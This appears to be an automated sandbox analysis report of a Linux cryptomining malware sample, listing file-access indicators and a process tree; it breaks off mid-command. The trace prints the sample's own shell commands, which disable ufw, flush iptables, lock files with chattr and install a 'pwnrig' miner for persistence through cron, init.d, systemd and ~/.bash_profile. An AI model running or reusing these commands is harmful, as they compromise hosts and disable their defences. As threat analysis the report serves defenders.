reading /sys/bus/cpu/devices/cpu0/cache/index2/type service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/shared_cpu_map service-agent File opened for reading /sys/fs/cgroup/unified/cgroup.controllers service-agent File opened for reading /sys/devices/system/node/online service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/size Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition service-agent File opened for reading /sys/bus/node/devices/node0/meminfo service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/coherency_line_size service-agent File opened for reading /sys/bus/node/devices/node0/access0/initiators service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map service-agent File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/thread_siblings service-agent File opened for reading /sys/bus/node/devices/node0/hugepages Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/type service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size Process not Found File opened for reading /sys/fs/cgroup/unified/cgroup.controllers service-agent File opened for reading /sys/kernel/mm/hugepages service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/type service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index3/level Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/level Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/topology/core_siblings service-agent File opened for reading /sys/bus/cpu/devices/cpu0/topology/physical_package_id service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index0/size service-agent File opened for reading /sys/bus/node/devices/node0/meminfo service-agent File opened for reading /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map service-agent File opened for reading /sys/fs/cgroup/cpuset/cpuset.cpus Process not Found File opened for reading /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map service-agent -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/1/environ systemctl File opened for reading /proc/30/cmdline ps File opened for reading /proc/199/status ps File opened for reading /proc/89/cmdline ps File opened for reading /proc/1153/cmdline pkill File opened for reading /proc/1470/status pkill File opened for reading /proc/1259/cmdline Process not Found File opened for reading /proc/10/status Process not Found File opened for reading /proc/1364/cmdline pgrep File opened for reading /proc/418/status pkill File opened for reading /proc/22/status Process not Found File opened for reading /proc/161/cmdline ps File opened for reading /proc/973/status pkill File opened for reading /proc/643/status Process not Found File opened for reading /proc/3/stat ps File opened for reading /proc/1185/status ps File opened for reading /proc/199/cmdline Process not Found File opened for reading /proc/26/status pkill File opened for reading /proc/1032/status ps File opened for reading /proc/166/stat ps File opened for reading /proc/1575/status ps File opened for reading /proc/1554/status ps File opened for reading /proc/171/cmdline Process not Found File opened for reading /proc/7/cmdline Process not Found File opened for reading /proc/1575/cmdline Process not Found File opened for reading /proc/6/cmdline pgrep File opened for reading /proc/1261/status ps File opened for reading /proc/664/stat ps File opened for reading /proc/1165/status Process not Found File opened for reading /proc/22/cmdline Process not Found File opened for reading /proc/10/stat Process not Found File opened for reading /proc/520/status Process not Found File opened for reading /proc/1152/status ps File opened for reading /proc/199/stat Process not Found File opened for reading /proc/27/status Process not Found File opened for reading /proc/1192/stat ps File opened for reading /proc/166/cmdline Process not Found File opened for reading /proc/4732/status Process not Found File opened for reading /proc/1575/cmdline Process not Found File opened for reading /proc/1046/stat ps File opened for reading /proc/2584/stat ps File opened for reading /proc/22/status pkill File opened for reading /proc/1829/status Process not Found File opened for reading /proc/454/cmdline pkill File opened for reading /proc/filesystems Process not Found File opened for reading /proc/1159/status Process not Found File opened for reading /proc/80/stat ps File opened for reading /proc/1089/status Process not Found File opened for reading /proc/452/cmdline Process not Found File opened for reading /proc/595/status ps File opened for reading /proc/664/stat Process not Found File opened for reading /proc/1075/cmdline Process not Found File opened for reading /proc/1032/status Process not Found File opened for reading /proc/859/stat ps File opened for reading /proc/700/status ps File opened for reading /proc/245/cmdline Process not Found File opened for reading /proc/1032/stat ps File opened for reading /proc/82/stat ps File opened for reading /proc/266/cmdline Process not Found File opened for reading /proc/4318/status Process not Found File opened for reading /proc/471/status Process not Found File opened for reading /proc/36/cmdline pkill File opened for reading /proc/164/stat ps File opened for reading /proc/652/stat ps -
Writes file to shm directory 2 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
description ioc Process File opened for modification /dev/shm/.klibsystem5 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /dev/shm/.klibsystem5 Process not Found -
Writes file to tmp directory 34 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.lock service-agent File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/service-agent 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/sys-helper 2f1854f309c913068700c0c3efec3a84ea48e62393df38bab9c8233053e2b19b.elf File opened for modification /tmp/service-agent Process not Found File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.lock service-agent File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock service-agent File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/.bashirc Process not Found File opened for modification /tmp/sys-helper Process not Found File opened for modification /tmp/~/.bash_profile sh File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/~/.bash_profile Process not Found File opened for modification /tmp/.lock Process not Found File opened for modification /tmp/.bashirc sys-helper File opened for modification /tmp/.lock service-agent
- Creates/modifies Cron job
- Modifies init.d
- Modifies systemd
- Writes file to system bin folder
- Writes file to shm directory
- Writes file to tmp directory
PID:1578 -
/bin/bashbash -c "ufw disable"2⤵PID:1582
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:1582 -
/sbin/iptables/sbin/iptables -V3⤵PID:1586
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵PID:1587
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1588
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1593
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1596
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1597
/sbin/iptablesiptables -F ufw-user-logging-input4⤵PID:1598
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1599
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1600
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵PID:1601
/sbin/iptablesiptables -F ufw-reject-input4⤵PID:1602
/sbin/iptablesiptables -F ufw-after-logging-input4⤵PID:1603
/sbin/iptablesiptables -F ufw-after-input4⤵PID:1604
/sbin/iptablesiptables -F ufw-user-input4⤵PID:1605
/sbin/iptablesiptables -F ufw-before-input4⤵PID:1606
/sbin/iptablesiptables -F ufw-before-logging-input4⤵PID:1607
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1608
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1609
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1610
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1611
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1612
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1613
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1614
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1615
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1616
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1617
/sbin/iptablesiptables -F ufw-track-input4⤵PID:1618
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1619
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1620
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1621
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1622
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1623
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1624
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1625
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1626
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1627
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1628
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1629
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵PID:1630
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1631
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1632
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵PID:1633
/sbin/iptablesiptables -Z ufw-reject-input4⤵PID:1634
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵PID:1635
/sbin/iptablesiptables -Z ufw-after-input4⤵PID:1636
/sbin/iptablesiptables -Z ufw-user-input4⤵PID:1637
/sbin/iptablesiptables -Z ufw-before-input4⤵PID:1638
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵PID:1639
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1640
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1641
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1642
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1643
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1644
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1645
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1646
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1647
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1648
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1649
/sbin/iptablesiptables -Z ufw-track-input4⤵PID:1650
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1651
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1652
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1653
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1654
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1655
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1656
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1657
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1658
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1659
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1660
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1661
/sbin/iptablesiptables -X ufw-user-logging-input4⤵PID:1662
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1663
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1664
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1665
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1666
/sbin/iptablesiptables -X ufw-user-input4⤵PID:1667
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1668
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1669
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵PID:1670
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1671
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1672
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1673
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1674
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1675
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1676
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1677
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1678
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵PID:1679
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1680
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1681
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵PID:1682
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵PID:1683
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵PID:1684
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵PID:1685
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵PID:1687
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵PID:1688
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵PID:1689
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1690
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1691
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1692
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1693
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1694
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1695
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1696
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1697
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1698
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1699
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵PID:1700
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1701
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1702
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1703
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1704
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1705
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1706
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1707
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1708
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1709
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1710
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1711
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵PID:1712
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1713
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1714
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵PID:1715
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵PID:1716
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵PID:1717
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵PID:1718
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵PID:1719
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵PID:1720
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵PID:1721
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1722
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1723
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1724
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1725
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1726
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1727
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1728
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1729
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1730
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1731
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵PID:1732
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1733
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1734
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1735
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1736
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1737
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1738
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1739
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1740
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1741
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1742
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1743
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵PID:1744
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1745
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1746
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1747
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1748
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵PID:1749
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1750
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1751
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵PID:1752
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output4⤵PID:1753
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward4⤵PID:1754
/sbin/ip6tablesip6tables -P INPUT ACCEPT4⤵PID:1755
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT4⤵PID:1756
/sbin/ip6tablesip6tables -P FORWARD ACCEPT4⤵PID:1757
/bin/bashbash -c "iptables -P INPUT ACCEPT"2⤵PID:1758
/sbin/iptablesiptables -P INPUT ACCEPT2⤵PID:1758
/bin/bashbash -c "iptables -P OUTPUT ACCEPT"2⤵PID:1759
/sbin/iptablesiptables -P OUTPUT ACCEPT2⤵PID:1759
/bin/bashbash -c "iptables -P FORWARD ACCEPT"2⤵PID:1760
/sbin/iptablesiptables -P FORWARD ACCEPT2⤵PID:1760
/bin/bashbash -c "iptables -F"2⤵PID:1761
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
/bin/bashbash -c "chattr -ia /etc/"2⤵PID:1762
/usr/bin/chattrchattr -ia /etc/⤵PID:1762
/usr/bin/pgreppgrep -f klibsystem42⤵PID:1763
/usr/bin/pgreppgrep -f klibsystem52⤵
- Reads runtime system information
/usr/bin/chattrchattr +ia /etc/init.d/knlib2⤵
- Attempts to change immutable files
/etc/init.d/knlib/etc/init.d/knlib start2⤵
- Executes dropped EXE
PID:1766 -
/bin/cpcp -f -r -- /bin/knlib5 /bin/klibsystem53⤵PID:1767
/bin/rmrm -rf -- klibsystem53⤵PID:1769
/usr/bin/nohupnohup ./klibsystem53⤵PID:1768
/usr/bin/chattrchattr +ia /etc/systemd/system/knlibe.service2⤵PID:1770
/bin/systemctlsystemctl daemon-reload2⤵PID:1771
/bin/systemctlsystemctl enable knlibe.service2⤵PID:1792
/usr/bin/chattrchattr +ia /bin/knlib52⤵PID:1813
/usr/bin/crontabcrontab -r2⤵PID:1814
/usr/bin/pkillpkill -f .klibsystem52⤵
- Reads CPU attributes
- Reads runtime system information
/usr/bin/pkillpkill -f .klibsystem42⤵PID:1816
/bin/bashbash -c "echo \"* * * * * /dev/shm/.klibsystem5 >/dev/null 2>&1\" | crontab -"2⤵PID:1817
/usr/bin/crontabcrontab -3⤵PID:1819
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib42⤵PID:1820
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib42⤵PID:1821
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib42⤵PID:1822
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib42⤵
- Attempts to change immutable files
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib42⤵PID:1824
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib42⤵PID:1825
/usr/bin/chattrchattr -ia /etc/anacrontab2⤵
- Attempts to change immutable files
/usr/bin/chattrchattr +ia /etc/anacrontab2⤵PID:1827
- Executes dropped EXE
- Writes file to tmp directory
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn2⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:1830 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""3⤵
- Attempts to change immutable files
PID:1831 -
/bin/grepgrep -c "^processor" /proc/cpuinfo4⤵
- Checks CPU configuration
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"3⤵PID:1860
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"4⤵PID:1862
/bin/psps -A "-ostat,ppid"4⤵PID:1861
/usr/bin/idid -u4⤵PID:1864
/bin/grepgrep -v grep4⤵PID:1867
/bin/grepgrep /etc/cron4⤵PID:1866
/bin/psps x4⤵PID:1865
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\\\\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- 